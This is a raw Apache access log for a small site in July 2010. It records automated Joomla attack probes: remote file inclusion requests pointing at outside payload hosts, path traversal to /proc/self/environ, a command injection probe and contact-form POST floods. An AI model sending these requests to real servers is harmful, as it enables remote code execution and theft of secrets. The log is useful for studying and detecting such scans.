222.236.47.182 - - [24/Jul/2010:04:50:38 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:04:50:40 -0700] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
85.236.50.166 - - [24/Jul/2010:04:50:46 -0700] "GET /logs/access_100508.log//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
85.236.50.166 - - [24/Jul/2010:04:50:46 -0700] "GET /logs/access_100508.log//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:04:50:59 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:04:51:00 -0700] "GET /logs/access_100703.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:04:51:03 -0700] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
74.124.198.168 - - [24/Jul/2010:04:51:04 -0700] "GET /logs/access_100529.log/errors.php?error=http://livetest.foregroundsecurity.com//Iivetest/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
207.210.86.178 - - [24/Jul/2010:04:51:07 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://christr.com/images/myid.jpg? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
207.210.86.178 - - [24/Jul/2010:04:51:07 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://christr.com/images/myid.jpg? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
74.124.198.168 - - [24/Jul/2010:04:51:10 -0700] "GET /logs/access_100522.log/errors.php?error=http://livetest.foregroundsecurity.com//Iivetest/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:04:51:34 -0700] "GET /logs/access_100605.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
202.12.74.249 - - [24/Jul/2010:04:52:18 -0700] "GET /logs/access_100619.log%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absol=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
202.12.74.249 - - [24/Jul/2010:04:52:18 -0700] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absol=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
202.12.74.249 - - [24/Jul/2010:04:52:18 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absol=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:04:52:32 -0700] "GET /logs/access_100529.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:04:52:50 -0700] "GET /logs/access_100605.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
117.103.56.20 - - [24/Jul/2010:04:53:04 -0700] "GET /logs/access_100522.log/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
117.103.56.20 - - [24/Jul/2010:04:53:08 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
117.103.56.20 - - [24/Jul/2010:04:53:09 -0700] "GET /logs/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
117.103.56.20 - - [24/Jul/2010:04:53:16 -0700] "GET /logs/access_100424.log/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
117.103.56.20 - - [24/Jul/2010:04:53:40 -0700] "GET /logs/access_100522.log/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
117.103.56.20 - - [24/Jul/2010:04:53:41 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
117.103.56.20 - - [24/Jul/2010:04:53:44 -0700] "GET /logs/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
117.103.56.20 - - [24/Jul/2010:04:53:53 -0700] "GET /logs/access_100424.log/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:04:53:57 -0700] "GET /logs/access_100417.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:04:54:03 -0700] "GET /logs/access_100529.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:04:55:24 -0700] "GET /logs/access_100306.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
207.210.86.178 - - [24/Jul/2010:04:55:37 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://christr.com/images/myid.jpg? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
207.210.86.178 - - [24/Jul/2010:04:55:37 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://christr.com/images/myid.jpg? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:04:56:13 -0700] "GET /logs/access_100605.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
202.12.74.249 - - [24/Jul/2010:04:56:28 -0700] "GET /logs/access_100619.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absol=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:04:56:44 -0700] "GET /logs/access_100306.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
74.124.198.168 - - [24/Jul/2010:04:57:03 -0700] "GET /login.php?dir=http://livetest.foregroundsecurity.com//Iivetest/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
74.124.198.168 - - [24/Jul/2010:04:57:03 -0700] "GET /logs//login.php?dir=http://livetest.foregroundsecurity.com//Iivetest/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
74.124.198.168 - - [24/Jul/2010:04:57:03 -0700] "GET /logs/access.log%20%20//login.php?dir=http://livetest.foregroundsecurity.com//Iivetest/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:04:57:43 -0700] "GET /logs/access_100605.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
74.124.198.168 - - [24/Jul/2010:04:58:00 -0700] "GET /logs/access_100619.log%20%20//login.php?dir=http://livetest.foregroundsecurity.com//Iivetest/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
178.154.163.29 - - [24/Jul/2010:05:00:34 -0700] "GET /logs/access_100417.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:05:02:25 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:05:02:25 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:05:02:25 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:05:02:25 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:05:02:25 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:05:02:25 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:05:02:25 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:05:02:25 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:05:02:26 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:05:02:26 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:05:02:26 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:05:02:26 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
80.48.73.1 - - [24/Jul/2010:05:06:23 -0700] "GET /index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
80.48.73.1 - - [24/Jul/2010:05:06:39 -0700] "GET /index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
80.48.73.1 - - [24/Jul/2010:05:08:05 -0700] "GET /logs/access_100529.log/index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
80.48.73.1 - - [24/Jul/2010:05:08:05 -0700] "GET /index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
80.48.73.1 - - [24/Jul/2010:05:08:05 -0700] "GET /logs/index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
80.48.73.1 - - [24/Jul/2010:05:08:14 -0700] "GET /logs/access_100529.log/index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
80.48.73.1 - - [24/Jul/2010:05:08:14 -0700] "GET /index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
80.48.73.1 - - [24/Jul/2010:05:08:15 -0700] "GET /logs/index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
80.48.73.1 - - [24/Jul/2010:05:08:34 -0700] "GET /logs/access_100529.log/index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
80.48.73.1 - - [24/Jul/2010:05:08:35 -0700] "GET /index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
80.48.73.1 - - [24/Jul/2010:05:08:35 -0700] "GET /logs/index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
80.48.73.1 - - [24/Jul/2010:05:08:42 -0700] "GET /logs/access_100529.log/index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
80.48.73.1 - - [24/Jul/2010:05:08:42 -0700] "GET /index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
80.48.73.1 - - [24/Jul/2010:05:08:42 -0700] "GET /logs/index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
74.124.198.168 - - [24/Jul/2010:05:09:09 -0700] "GET /logs/access_100703.log//login.php?dir=http://livetest.foregroundsecurity.com//Iivetest/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
74.124.198.168 - - [24/Jul/2010:05:09:18 -0700] "GET /logs/access_100619.log//login.php?dir=http://livetest.foregroundsecurity.com//Iivetest/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
80.48.73.1 - - [24/Jul/2010:05:09:23 -0700] "GET /logs/access_100612.log/index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:05:09:25 -0700] "GET /index.php?option=com_lurm_constructor&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
80.48.73.1 - - [24/Jul/2010:05:09:28 -0700] "GET /logs/access_100612.log/index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:05:10:24 -0700] "GET /index.php?option=com_lurm_constructor&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:05:12:04 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:05:12:04 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:05:12:04 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:05:12:04 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:05:12:04 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:05:12:05 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:05:12:05 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:05:12:05 -0700] "POST /logs/access.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:05:12:05 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:05:12:05 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:05:12:05 -0700] "POST /logs/access.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:05:12:05 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:05:12:05 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:05:12:05 -0700] "POST /logs/access.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:05:12:05 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:05:12:05 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:05:12:05 -0700] "POST /logs/access.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:05:12:06 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:05:12:06 -0700] "POST /logs/access.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:05:12:06 -0700] "POST /logs/access.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
87.229.26.132 - - [24/Jul/2010:05:12:06 -0700] "POST /logs/access.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
77.221.39.243 - - [24/Jul/2010:05:12:28 -0700] "POST /logs/access.log%20%20/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
77.221.39.243 - - [24/Jul/2010:05:12:28 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
77.221.39.243 - - [24/Jul/2010:05:12:28 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
77.221.39.243 - - [24/Jul/2010:05:12:28 -0700] "POST /logs/access.log%20%20/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
77.221.39.243 - - [24/Jul/2010:05:12:28 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
77.221.39.243 - - [24/Jul/2010:05:12:28 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
77.221.39.243 - - [24/Jul/2010:05:12:28 -0700] "POST /logs/access.log%20%20/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
77.221.39.243 - - [24/Jul/2010:05:12:28 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
77.221.39.243 - - [24/Jul/2010:05:12:28 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
77.221.39.243 - - [24/Jul/2010:05:12:28 -0700] "POST /logs/access.log%20%20/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
77.221.39.243 - - [24/Jul/2010:05:12:28 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
77.221.39.243 - - [24/Jul/2010:05:12:28 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
67.195.111.183 - - [24/Jul/2010:05:13:09 -0700] "GET / HTTP/1.0" 200 899 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.getyourselfahorse.com"
67.195.111.183 - - [24/Jul/2010:05:13:51 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.getyourselfahorse.com"
95.108.150.235 - - [24/Jul/2010:05:14:30 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.getyourselfahorse.com"
95.108.150.235 - - [24/Jul/2010:05:14:30 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "getyourselfahorse.com"
95.108.150.235 - - [24/Jul/2010:05:14:31 -0700] "GET / HTTP/1.1" 200 915 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.getyourselfahorse.com"
95.108.150.235 - - [24/Jul/2010:05:14:31 -0700] "GET / HTTP/1.1" 200 915 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "getyourselfahorse.com"
95.108.150.235 - - [24/Jul/2010:05:14:32 -0700] "GET / HTTP/1.1" 200 915 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "getyourselfahorse.com"
95.108.150.235 - - [24/Jul/2010:05:14:42 -0700] "GET / HTTP/1.1" 200 915 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.getyourselfahorse.com"
67.195.111.183 - - [24/Jul/2010:05:15:29 -0700] "GET /logs/ HTTP/1.0" 200 3925 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.getyourselfahorse.com"
67.195.111.183 - - [24/Jul/2010:05:19:47 -0700] "GET /?N=A HTTP/1.0" 200 899 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:05:24:08 -0700] "GET /logs/access_100306.log//index.php?option=com_lurm_constructor&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:05:24:09 -0700] "GET /index.php?option=com_lurm_constructor&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:05:24:09 -0700] "GET /logs/access_100306.log//index.php?option=com_lurm_constructor&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:05:24:10 -0700] "GET /index.php?option=com_lurm_constructor&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:05:24:10 -0700] "GET /logs//index.php?option=com_lurm_constructor&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:05:24:11 -0700] "GET /logs//index.php?option=com_lurm_constructor&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
212.174.28.46 - - [24/Jul/2010:05:24:36 -0700] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absol=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.174.28.46 - - [24/Jul/2010:05:24:36 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absol=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.174.28.46 - - [24/Jul/2010:05:24:36 -0700] "GET /logs/access_100619.log%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absol=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
207.46.199.180 - - [24/Jul/2010:05:25:19 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.getyourselfahorse.com"
